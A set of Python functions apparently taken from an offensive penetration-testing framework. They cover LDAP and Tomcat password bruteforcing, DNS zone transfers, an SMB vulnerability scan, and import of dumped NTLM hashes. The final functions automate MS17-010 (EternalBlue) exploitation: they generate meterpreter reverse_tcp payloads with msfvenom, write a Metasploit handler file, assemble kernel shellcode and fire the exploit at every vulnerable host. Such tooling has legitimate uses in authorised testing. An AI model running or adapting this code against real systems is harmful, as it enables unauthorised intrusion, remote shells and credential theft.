def main():
    """ Command line tool to add, count or list hosts in the database. """
    hs = HostSearch()
    arg = argparse.ArgumentParser(parents=[hs.argparser], conflict_handler='resolve')
    arg.add_argument('-c', '--count', help="Only show the number of results", action="store_true")
    # Fixed help text: this flag adds a host, not a range (copy-paste from the range tool).
    arg.add_argument('-a', '--add', help="Add a new host", action="store_true")
    arguments = arg.parse_args()
    if arguments.add:
        # Interactively create a new host document and show it.
        print_notification("Adding new host")
        address = input("What host do you want to add? ")
        host = hs.id_to_object(address)
        print_success("Added a new host:")
        print_json(host.to_dict(include_meta=True))
    elif arguments.count:
        print_line("Number of hosts: {}".format(hs.argument_count()))
    else:
        # Default: dump every matching host as json.
        response = hs.get_hosts()
        for hit in response:
            print_json(hit.to_dict(include_meta=True))
def bruteforce(users, domain, password, host):
    """
    Performs a bruteforce for the given users, password, domain on the given host.
    """
    cs = CredentialSearch(use_pipe=False)
    print_notification("Connecting to {}".format(host))
    s = Server(host)
    c = Connection(s)
    for user in users:
        # Bind as DOMAIN\username. The original format string contained no
        # placeholders, so domain and username were silently dropped and every
        # bind used the same literal user string.
        if c.rebind(user="{}\\{}".format(domain, user.username), password=password, authentication=NTLM):
            print_success('Success for: {}:{}'.format(user.username, password))
            credential = cs.find_object(user.username, password, domain=domain, host_ip=host)
            if not credential:
                credential = Credential(username=user.username, secret=password, domain=domain, host_ip=host, type="plaintext", port=389)
            # NOTE(review): `tag` is not defined in this function — presumably a
            # module-level constant; confirm it is in scope at import time.
            credential.add_tag(tag)
            credential.save()
            # Add a tag to the user object, so we dont have to bruteforce it again.
            user.add_tag(tag)
            user.save()
        else:
            print_error("Fail for: {}:{}".format(user.username, password))
def main():
    """ Command line tool to add, count or list ranges in the database. """
    rs = RangeSearch()
    parser = argparse.ArgumentParser(parents=[rs.argparser], conflict_handler='resolve')
    parser.add_argument('-c', '--count', help="Only show the number of results", action="store_true")
    parser.add_argument('-a', '--add', help="Add a new range", action="store_true")
    opts = parser.parse_args()
    if opts.add:
        # Interactively create a new range document and show it.
        print_notification("Adding new range")
        range_str = input("What range do you want to add? ")
        new_range = rs.id_to_object(range_str)
        print_success("Added a new range:")
        print_json(new_range.to_dict(include_meta=True))
    elif opts.count:
        print_line("Number of ranges: {}".format(rs.argument_count()))
    else:
        # Default: dump every matching range as json.
        for hit in rs.get_ranges():
            print_json(hit.to_dict(include_meta=True))
def pipe_worker(pipename, filename, object_type, query, format_string, unique=False):
    """
    Starts the loop to provide the data from jackal.

    Creates a named pipe at `filename`; every time a reader opens it, the
    results of `object_type.search(**query)` are formatted with
    `format_string` and written, one per line. With `unique=True`,
    duplicate lines are suppressed within a single pass.
    """
    print_notification("[{}] Starting pipe".format(pipename))
    object_type = object_type()
    try:
        while True:
            uniq = set()
            # Remove the previous file if it exists
            if os.path.exists(filename):
                os.remove(filename)
            # Create the named pipe
            os.mkfifo(filename)
            # This open blocks until some process opens the pipe for reading.
            with open(filename, 'w') as pipe:
                print_success("[{}] Providing data".format(pipename))
                # Search the database
                objects = object_type.search(**query)
                for obj in objects:
                    data = fmt.format(format_string, **obj.to_dict())
                    if unique:
                        if data not in uniq:
                            uniq.add(data)
                            pipe.write(data + '\n')
                    else:
                        pipe.write(data + '\n')
            os.unlink(filename)
    except KeyboardInterrupt:
        print_notification("[{}] Shutting down named pipe".format(pipename))
    except Exception as e:
        # The format arguments were swapped in the original: the exception text
        # ended up in the [pipename] slot and vice versa.
        print_error("[{}] Error: {}, stopping named pipe".format(pipename, e))
    finally:
        # The pipe may already have been unlinked above; don't raise from cleanup.
        if os.path.exists(filename):
            os.remove(filename)
def new_range(self, ip_range):
    """ Function called when a new range was seen """
    # `x not in y` is the idiomatic form of `not x in y`.
    if ip_range not in self.ip_ranges:
        self.ip_ranges.add(ip_range)
        # Persist the new range with a tag marking where it was discovered.
        doc = self.rs.id_to_object(ip_range)
        doc.add_tag('sniffer')
        doc.save()
        print_success("New ip range: {}".format(ip_range))
def new_ip(self, ip):
    """ Function called when a new IP address was seen """
    # `x not in y` is the idiomatic form of `not x in y`.
    if ip not in self.ip_list:
        self.ip_list.add(ip)
        # Persist the new host with a tag marking where it was discovered.
        host = self.hs.id_to_object(ip)
        host.add_tag('sniffer')
        host.save()
        print_success("New ip address: {}".format(ip))
def nmap_smb_vulnscan():
    """ Scans available smb services in the database for smb signing and ms17-010. """
    service_search = ServiceSearch()
    # Only port-445 services that are up and not already scanned by this tool.
    services = service_search.get_services(ports=['445'], tags=['!smb_vulnscan'], up=True)
    services = [service for service in services]
    service_dict = {}
    for service in services:
        # Tag immediately so the service is excluded from future runs.
        service.add_tag('smb_vulnscan')
        service_dict[str(service.address)] = service

    nmap_args = "-Pn -n --disable-arp-ping --script smb-security-mode.nse,smb-vuln-ms17-010.nse -p 445".split(
        " ")
    if services:
        result = nmap(nmap_args, [str(s.address) for s in services])
        parser = NmapParser()
        report = parser.parse_fromstring(result)
        smb_signing = 0
        ms17 = 0
        for nmap_host in report.hosts:
            for script_result in nmap_host.scripts_results:
                # Script output values live under the 'elements' key.
                script_result = script_result.get('elements', {})
                service = service_dict[str(nmap_host.address)]
                if script_result.get('message_signing', '') == 'disabled':
                    print_success("({}) SMB Signing disabled".format(
                        nmap_host.address))
                    service.add_tag('smb_signing_disabled')
                    smb_signing += 1
                if script_result.get('CVE-2017-0143', {}).get('state', '') == 'VULNERABLE':
                    print_success("({}) Vulnerable for MS17-010".format(
                        nmap_host.address))
                    service.add_tag('MS17-010')
                    ms17 += 1
                # Persist any tags added above.
                service.update(tags=service.tags)
        print_notification(
            "Completed, 'smb_signing_disabled' tag added to systems with smb signing disabled, 'MS17-010' tag added to systems that did not apply MS17-010."
        )
        # Summary statistics for the jackal event log.
        stats = {
            'smb_signing': smb_signing,
            'MS17_010': ms17,
            'scanned_services': len(services)
        }
        Logger().log(
            'smb_vulnscan',
            'Scanned {} smb services for vulnerabilities'.format(
                len(services)), stats)
    else:
        print_notification("No services found to scan.")
def exploit(self):
    """
    Starts the exploiting phase, you should run setup before running this function.
    if auto is set, this function will fire the exploit to all systems. Otherwise a curses interface is shown.
    """
    search = ServiceSearch()
    host_search = HostSearch()
    services = search.get_services(tags=['MS17-010'])
    services = [service for service in services]
    if len(services) == 0:
        print_error("No services found that are vulnerable for MS17-010")
        return

    def get_host_os(address):
        """ Returns (host, os) for address, detecting and persisting the OS if unknown. """
        host = host_search.id_to_object(address)
        if host.os:
            return host, host.os
        system_os = self.detect_os(address)
        host.os = system_os
        host.save()
        return host, system_os

    if self.auto:
        print_success("Found {} services vulnerable for MS17-010".format(
            len(services)))
        for service in services:
            print_success("Exploiting " + str(service.address))
            _, system_os = get_host_os(str(service.address))
            text = self.exploit_single(str(service.address), system_os)
            print_notification(text)
    else:
        # Build the entries for the curses selection interface.
        service_list = []
        for service in services:
            host, system_os = get_host_os(str(service.address))
            service_list.append({
                'ip': service.address,
                'os': system_os,
                'string': "{ip} ({os}) {hostname}".format(ip=service.address, os=system_os, hostname=host.hostname)
            })
        draw_interface(service_list, self.callback, "Exploiting {ip} with OS: {os}")
def parse_file(filename):
    """
    Imports one secretsdump output file: the host ip is extracted from the
    filename and every well-formed hash line is stored as an ntlm credential.
    """
    cs = CredentialSearch()
    us = UserSearch()
    print_notification("Processing {}".format(filename))
    if not os.path.isfile(filename):
        print_error("Given path is not a file, skipping...")
        return
    # The host ip is encoded in the file name, e.g. "10.0.0.1_samhashes.sam".
    pattern = r"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}"
    result = re.findall(pattern, filename)
    if result:
        ip = result[0]
        print_notification("Host IP seems to be {}".format(ip))
    else:
        print_error("IP could not be obtained from the filename, skipping...")
        return
    with open(filename, 'r') as f:
        data = [line.strip() for line in f]
    count = 0
    print_notification("Importing {} credentials".format(len(data)))
    for line in data:
        s = line.split(':')
        # secretsdump lines look like: user:rid:lmhash:nthash:::
        if len(s) == 7:
            username = s[0]
            jackal_user = us.id_to_object(username)
            jackal_user.add_tag("secretsdump_import")
            jackal_user.save()
            # Store the secret as "lmhash:nthash".
            secret = s[2] + ":" + s[3]
            credential = cs.find_object(username=username, secret=secret, host_ip=ip)
            if not credential:
                credential = Credential(secret=secret, username=username, type='ntlm', host_ip=ip, port=445)
            credential.add_tag("secretsdump_import")
            credential.save()
            count += 1
        else:
            print_error("Malformed data:")
            print_error(line)
    if count > 0:
        print_success("{} credentials imported".format(count))
    else:
        print_error("No credentials imported")
def import_nmap(result, tag, check_function=all_hosts, import_services=False):
    """ Imports the given nmap result.

    result: raw nmap xml output string.
    tag: tag added to every imported host.
    check_function: predicate deciding whether an nmap host is imported.
    import_services: when True, also import the per-host services.
    Returns a dict with the number of imported hosts and services.
    """
    host_search = HostSearch(arguments=False)
    service_search = ServiceSearch()
    parser = NmapParser()
    report = parser.parse_fromstring(result)
    imported_hosts = 0
    imported_services = 0
    for nmap_host in report.hosts:
        if check_function(nmap_host):
            imported_hosts += 1
            host = host_search.id_to_object(nmap_host.address)
            host.status = nmap_host.status
            host.add_tag(tag)
            if nmap_host.os_fingerprinted:
                host.os = nmap_host.os_fingerprint
            if nmap_host.hostnames:
                host.hostname.extend(nmap_host.hostnames)
            if import_services:
                for service in nmap_host.services:
                    imported_services += 1
                    serv = Service(**service.get_dict())
                    serv.address = nmap_host.address
                    service_id = service_search.object_to_id(serv)
                    if service_id:
                        # Existing object, save the banner and script results.
                        serv_old = Service.get(service_id)
                        if service.banner:
                            serv_old.banner = service.banner
                        # TODO implement
                        # if service.script_results:
                        #     serv_old.script_results.extend(service.script_results)
                        serv_old.save()
                    else:
                        # New object
                        serv.address = nmap_host.address
                        serv.save()
                    # Record the port on the host under the matching state list.
                    if service.state == 'open':
                        host.open_ports.append(service.port)
                    if service.state == 'closed':
                        host.closed_ports.append(service.port)
                    if service.state == 'filtered':
                        host.filtered_ports.append(service.port)
            host.save()
    if imported_hosts:
        print_success("Imported {} hosts, with tag {}".format(
            imported_hosts, tag))
    else:
        print_error("No hosts found")
    return {'hosts': imported_hosts, 'services': imported_services}
def modify_input():
    """ This functions gives the user a way to change the data that is given as input. """
    doc_mapper = DocMapper()
    if not doc_mapper.is_pipe:
        print_error("Please use this tool with pipes")
        return
    # Collect the piped objects, let the user edit them, persist every line back.
    objects = [obj for obj in doc_mapper.get_pipe()]
    for line in modify_data(objects):
        doc_mapper.line_to_object(line).save()
    print_success("Object(s) successfully changed")
def main():
    """ Imports every CrackMapExec database found under ~/.cme/workspaces. """
    print_notification("Importing cme")
    cme_workspaces_dir = join(expanduser('~'), '.cme', 'workspaces')
    if not exists(cme_workspaces_dir):
        return
    print_success("Found cme directory")
    # Every workspace directory can contain multiple database files.
    for workspace in os.listdir(cme_workspaces_dir):
        workspace_path = join(cme_workspaces_dir, workspace)
        for database in os.listdir(workspace_path):
            print_notification("Importing {}".format(database))
            import_database(join(workspace_path, database))
def modify_data(data):
    """
    Creates a tempfile and starts the given editor, returns the data afterwards.

    Each entry is serialized as one json document per line; after the editor
    exits, the (possibly modified) lines are returned.
    """
    with tempfile.NamedTemporaryFile('w') as f:
        for entry in data:
            f.write(json.dumps(entry.to_dict(
                include_meta=True), default=datetime_handler))
            f.write('\n')
        f.flush()
        print_success("Starting editor")
        # Honor the user's preferred editor, falling back to nano. The original
        # hard-coded nano and passed a stray '-' argument (which nano treats as
        # a literal file name); the '-' served no purpose and was dropped.
        editor = os.environ.get('EDITOR', 'nano')
        subprocess.call([editor, f.name])
        with open(f.name, 'r') as edited:
            return edited.readlines()
def add_tag():
    """ Obtains the data from the pipe and appends the given tag. """
    if len(sys.argv) < 2:
        print_error("Usage: jk-add-tag <tag>")
        sys.exit()
    tag = sys.argv[1]
    doc_mapper = DocMapper()
    if not doc_mapper.is_pipe:
        print_error("Please use this script with pipes")
        return
    count = 0
    # Tag every piped object and persist only the tags field.
    for obj in doc_mapper.get_pipe():
        obj.add_tag(tag)
        obj.update(tags=obj.tags)
        count += 1
    print_success("Added tag '{}' to {} object(s)".format(tag, count))
def brutefore_passwords(ip, url, credentials, service):
    """ Bruteforce function, will try all the credentials at the same time, splits the given credentials at a ':'. """
    # Build one basic-auth request per credential; fire them concurrently.
    auth_requests = []
    for credential in credentials:
        parts = credential.strip().split(':')
        username = parts[0]
        password = parts[1] if len(parts) > 1 else ''
        auth_requests.append(grequests.get(url, auth=(username, password)))
    results = grequests.map(auth_requests)
    for result in results:
        if result and result.status_code == 200:
            # Recover the credentials from the Authorization header we sent.
            encoded = result.request.headers['Authorization'].split(' ')[1]
            decoded = base64.b64decode(encoded).decode('utf-8')
            creds = decoded.split(':')
            print_success("Found a password for tomcat: {0}:{1} at: {2}".format(
                creds[0], creds[1], url))
            credential = Credential(secret=creds[1], username=creds[0], type='plaintext', access_level='administrator', service_id=service.id, host_ip=ip, description='Tomcat')
            credential.save()
def check_service(service):
    """ Connect to a service to see if it is a http or https server. """
    service.add_tag('header_scan')

    def probe(scheme, **request_args):
        """ HEAD-request the service over `scheme`; tag it, store the Server banner and return True on success. """
        try:
            result = requests.head('{}://{}:{}'.format(scheme, service.address, service.port), **request_args)
            print_success("Found {} service on {}:{}".format(
                scheme, service.address, service.port))
            service.add_tag(scheme)
            if 'Server' in result.headers:
                service.banner = result.headers['Server']
            return True
        except (ConnectionError, ConnectTimeout, ReadTimeout, Error):
            return False

    # Try plain http first; only fall back to https when that fails.
    if not probe('http', timeout=1):
        probe('https', verify=False, timeout=3)
    service.save()
def import_domaindump():
    """
    Parses ldapdomaindump files and stores hosts and users in elasticsearch.
    """
    parser = argparse.ArgumentParser(
        description=
        "Imports users, groups and computers result files from the ldapdomaindump tool, will resolve the names from domain_computers output for IPs"
    )
    parser.add_argument("files", nargs='+', help="The domaindump files to import")
    args = parser.parse_args()

    users_file = ''
    groups_file = ''
    n_computers = 0
    n_users = 0
    stats = {}
    # Sort the given files by type: computers are imported right away, while
    # users and groups are remembered and imported together afterwards.
    for path in args.files:
        if path.endswith('domain_computers.json'):
            print_notification('Parsing domain computers')
            n_computers = parse_domain_computers(path)
            if n_computers:
                stats['hosts'] = n_computers
                print_success("{} hosts imported".format(n_computers))
        elif path.endswith('domain_users.json'):
            users_file = path
        elif path.endswith('domain_groups.json'):
            groups_file = path
    if users_file:
        print_notification("Parsing domain users")
        n_users = parse_domain_users(users_file, groups_file)
        if n_users:
            print_success("{} users imported".format(n_users))
            stats['users'] = n_users
    Logger().log(
        "import_domaindump",
        'Imported domaindump, found {} user, {} systems'.format(n_users, n_computers),
        stats)
def zone_transfer(address, dns_name):
    """ Tries to perform a zone transfer. """
    ips = []
    try:
        print_notification("Attempting dns zone transfer for {} on {}".format(dns_name, address))
        zone = dns.zone.from_xfr(dns.query.xfr(address, dns_name))
    except dns.exception.FormError:
        # The server refused the transfer.
        print_notification("Zone transfer not allowed")
        return ips
    names = zone.nodes.keys()
    print_success("Zone transfer successfull for {}, found {} entries".format(address, len(names)))
    # Collect the IPv4 addresses from every node's A records.
    for name in names:
        rdataset = zone[name].get_rdataset(dns.rdataclass.IN, dns.rdatatype.A)
        if not rdataset:
            continue
        # TODO add hostnames to entries.
        # hostname = name.to_text()
        for record in rdataset.items:
            ips.append(record.address)
    return ips
def parse_ips(ips, netmask, include_public):
    """
    Parses the list of ips, turns these into ranges based on the netmask given.
    Set include_public to True to include public IP adresses.
    """
    hs = HostSearch()
    rs = RangeSearch()
    included_ips = []
    ranges = []
    # Deduplicate the input before processing.
    for ip in list(set(ips)):
        if include_public or ipaddress.ip_address(ip).is_private:
            print_success("Found ip: {}".format(ip))
            host = hs.id_to_object(ip)
            host.add_tag('dns_discover')
            host.save()
            # Collapse the ip into its network according to the given netmask.
            network = ipaddress.IPv4Network("{}/{}".format(ip, netmask), strict=False)
            ranges.append(str(network))
            included_ips.append(ip)
        else:
            print_notification("Excluding ip {}".format(ip))
    unique_ranges = list(set(ranges))
    for rng in unique_ranges:
        print_success("Found range: {}".format(rng))
        range_doc = rs.id_to_object(rng)
        range_doc.add_tag('dns_discover')
        range_doc.save()
    return {'ips': included_ips, 'ranges': unique_ranges}
def callback(self, event):
    """ Function that gets called on each event from pyinotify. """
    # IN_CLOSE_WRITE -> 0x00000008
    if event.mask != 0x00000008:
        return
    name = event.name
    if name.endswith('.json'):
        print_success("Ldapdomaindump file found")
        if name in ['domain_groups.json', 'domain_users.json']:
            if name == 'domain_groups.json':
                self.domain_groups_file = event.pathname
            if name == 'domain_users.json':
                self.domain_users_file = event.pathname
            # Import only once both files have been seen.
            if self.domain_groups_file and self.domain_users_file:
                print_success("Importing users")
                subprocess.Popen([
                    'jk-import-domaindump', self.domain_groups_file,
                    self.domain_users_file
                ])
        elif name == 'domain_computers.json':
            print_success("Importing computers")
            subprocess.Popen(['jk-import-domaindump', event.pathname])
        # Ldap has been dumped, so remove the ldap targets.
        self.ldap_strings = []
        self.write_targets()
    if name.endswith('_samhashes.sam'):
        host = name.replace('_samhashes.sam', '')
        # TODO import file.
        print_success("Secretsdump file, host ip: {}".format(host))
        subprocess.Popen(['jk-import-secretsdump', event.pathname])
        # Remove this system from this ip list.
        self.ips.remove(host)
        self.write_targets()
def setup(self):
    """
    This function will call msfvenom, nasm and git via subprocess to setup all the things.
    Returns True if everything went well, otherwise returns False.
    """
    lport64 = self.port64
    lport32 = self.port32
    print_notification("Using ip: {}".format(self.ip))
    print_notification("Generating metasploit resource file")
    resource = """use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST {ip}
set LPORT {port64}
set ExitOnSession false
run -j
set payload windows/meterpreter/reverse_tcp
set LHOST {ip}
set LPORT {port32}
set ExitOnSession false
run -j
""".format(ip=self.ip, port64=lport64, port32=lport32)
    self.resource_file = os.path.join(self.datadir, 'ms17_resource.rc')
    with open(self.resource_file, 'w') as f:
        f.write(resource)
    print_success(
        "Resource file created, run the following command in msfconsole:")
    print_success("resource {}".format(self.resource_file))

    # NOTE: the original named these the wrong way around (command_64 built the
    # 32 bit payload and vice versa). Both commands were still executed, so
    # behavior is unchanged; the names now match the payload they generate.
    command_64 = "msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f raw -o {datadir}/payload64.bin".format(
        ip=self.ip, port=lport64, datadir=self.datadir)
    command_32 = "msfvenom -p windows/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f raw -o {datadir}/payload32.bin".format(
        ip=self.ip, port=lport32, datadir=self.datadir)

    print_notification("Generating payloads")

    # The 64 bit payload was generated first in the original; keep that order.
    for command in [command_64, command_32]:
        process = subprocess.run(command.split(' '), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        if process.returncode != 0:
            print_error("Problem with generating payload:")
            print_error(process.stderr)
            return False

    if not os.path.exists(os.path.join(self.datadir, 'MS17-010')):
        print_notification("Git repo was not found, cloning")
        process = subprocess.run(
            "git clone https://github.com/mwgielen/MS17-010 {dir}".format(
                dir=os.path.join(self.datadir, 'MS17-010')).split(' '))
        if process.returncode != 0:
            print_error("Problems with cloning git")
            return False

    # Assemble the kernel shellcode stubs from the cloned repository.
    for asm_file, out_file in [('eternalblue_kshellcode_x64.asm', 'kshell64.bin'),
                               ('eternalblue_kshellcode_x86.asm', 'kshell86.bin')]:
        process = subprocess.run(
            "nasm {datadir}/MS17-010/shellcode/{asm} -o {datadir}/{out}".format(
                datadir=self.datadir, asm=asm_file, out=out_file).split(' '))
        if process.returncode != 0:
            print_error("Problems with NASM")
            return False

    # Glue kernel shellcode and stage payloads into the final combined blob.
    self.combine_files('kshell64.bin', 'payload64.bin', 'final_met_64.bin')
    self.combine_files('kshell86.bin', 'payload32.bin', 'final_met_32.bin')
    self.create_payload('final_met_32.bin', 'final_met_64.bin', 'final_combined.bin')
    print_notification("Combining payloads done")
    print_success("Setup Done")
    return True